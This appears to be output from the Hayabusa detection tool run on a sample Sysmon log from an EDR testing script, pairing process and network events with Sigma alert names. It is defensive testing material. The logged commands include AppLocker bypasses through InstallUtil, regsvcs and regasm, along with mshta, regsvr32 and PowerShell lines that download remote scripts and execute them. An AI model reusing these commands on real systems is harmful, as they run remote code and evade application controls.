/LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.202 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.318 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.446 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.446 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:08.446 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:13.214 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:13.214 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:13.225 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.286 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.310 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:18.583 +00:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:20.186 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:20.711 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:20.711 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:21.567 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.215 +00:00,MSEDGEWIN10,1,medium,,PowerShell Web Download,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.232 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,,PowerShell Web Download,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:23.507 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:24.104 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:24.563 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:25.202 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:25.202 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.250 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.250 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.374 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:28.374 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.341 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.341 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.565 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.565 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.646 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6552 | PGUID: 747F3D96-6628-5D3F-0000-0010349B8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:29.646 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:30.074 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4564 | PGUID: 747F3D96-6629-5D3F-0000-0010C0BE8800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.295 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-662E-5D3F-0000-001011038900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.295 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.411 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1976 | PGUID: 747F3D96-662E-5D3F-0000-0010C2048900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.411 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:34.483 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2604 | PGUID: 747F3D96-662E-5D3F-0000-001054068900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.312 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4092 | PGUID: 747F3D96-6633-5D3F-0000-001051608900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.312 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.358 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6633-5D3F-0000-001092628900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.358 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.372 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6633-5D3F-0000-0010F0638900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.907 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | LID: 0x413182 | PID: 3512 | PGUID: 747F3D96-6633-5D3F-0000-0010D9778900,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:39.907 +00:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation_sysmon/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:44.268 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1652 | PGUID: 